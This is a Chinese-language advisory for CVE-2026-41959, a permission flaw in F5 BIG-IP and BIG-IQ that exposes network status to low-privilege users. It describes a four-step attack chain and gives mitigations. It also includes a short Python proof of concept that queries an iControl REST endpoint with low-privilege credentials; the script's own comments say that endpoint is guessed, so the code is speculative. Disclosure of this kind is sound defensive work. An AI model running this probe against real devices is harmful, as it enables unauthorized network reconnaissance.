CVE-2026-41959 F5权限分配不当漏洞

漏洞信息

漏洞编号

CVE-2026-41959

漏洞类型

权限分配不当

CVSS评分

6.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP, BIG-IQ

漏洞概述

F5 BIG-IP和BIG-IQ产品的TMOS Shell (tmsh)网络诊断命令及iControl REST接口存在权限分配不当漏洞。该漏洞允许经过身份验证的低权限攻击者利用这些接口，绕过安全限制查看目标系统的网络状态信息。此问题可能导致敏感网络拓扑泄露，影响系统的机密性。

技术细节

该漏洞的核心原因在于F5 BIG-IP及BIG-IQ系统在处理特定网络诊断命令和REST API请求时，存在权限校验逻辑缺陷。具体而言，TMOS Shell (tmsh)中的某些网络诊断工具未正确验证调用者的权限级别，同时iControl REST接口对端点的访问控制列表（ACL）配置错误。攻击者只需具备本地低权限账户，即可通过SSH登录后执行受限的tmsh命令（如查看特定网络接口状态、路由表或连接表等），或直接向iControl REST发送未经授权的GET请求。由于CVSS向量中的范围变更（S:C），泄露的信息可能不仅限于本地系统，还可能涉及与其相连的其他网络设备状态。这种信息泄露不会直接导致系统崩溃或数据篡改，但为攻击者进行网络侦察和后续的横向移动提供了关键情报支持。

攻击链分析

STEP 1

1. 获取访问权限

攻击者获取BIG-IP设备的低权限用户账户（如操作员或只读账户），能够通过SSH登录或访问管理界面。

STEP 2

2. 识别漏洞接口

攻击者确认目标系统运行存在漏洞的TMOS版本，并识别出tmsh或iControl REST中涉及网络诊断的接口。

STEP 3

3. 执行未授权查询

攻击者使用低权限账户通过tmsh执行受限的网络诊断命令，或向iControl REST发送GET请求获取网络状态。

STEP 4

4. 获取敏感信息

由于权限分配不当，系统返回了详细的网络状态信息，攻击者利用这些信息分析网络拓扑。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-41959 Proof of Concept (Simulation)
# This script simulates an unauthorized attempt to access network diagnostics
# via iControl REST due to incorrect permission assignment.

import requests
import sys

# Configuration
TARGET_HOST = "https://<big-ip-management-ip>"
USERNAME = "low_priv_user"  # Low privilege user
PASSWORD = "password"

def exploit():
    # The endpoint for network status/diagnostics that should be restricted
    # Based on the vulnerability, this might be /mgmt/tm/net/ or similar diagnostics path
    url = f"{TARGET_HOST}/mgmt/tm/net/interface"

    try:
        print(f"[*] Attempting to access network diagnostics at {url}...")
        
        # Send request with basic auth using low-privilege credentials
        response = requests.get(
            url,
            auth=(USERNAME, PASSWORD),
            verify=False, # Ignore SSL certificate verification for testing
            timeout=10
        )

        if response.status_code == 200:
            print("[+] Success! Permission assignment vulnerability exploited.")
            print("[+] Leaked Network Status Information:")
            print(response.text)
        else:
            print(f"[-] Failed. Status Code: {response.status_code}")
            print("[-] The target might be patched or the endpoint is correctly restricted.")

    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    exploit()

影响范围

F5 BIG-IP (所有受支持版本，具体参考厂商公告K000161022)

F5 BIG-IQ (所有受支持版本，具体参考厂商公告K000161022)

防御指南

临时缓解措施

在应用补丁前，建议管理员严格限制对TMOS Shell (tmsh)的访问，仅允许必要的管理员账户使用。同时，通过网络访问控制列表（ACL）限制对iControl REST接口的访问来源，监控并审计系统日志中是否存在低权限用户尝试访问敏感网络诊断命令的行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-41959
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-41959
3 Details https://www.cvedetails.com/cve/CVE-2026-41959/
4 VulDB https://vuldb.com/cve/CVE-2026-41959
5 Link https://my.f5.com/manage/s/article/K000161022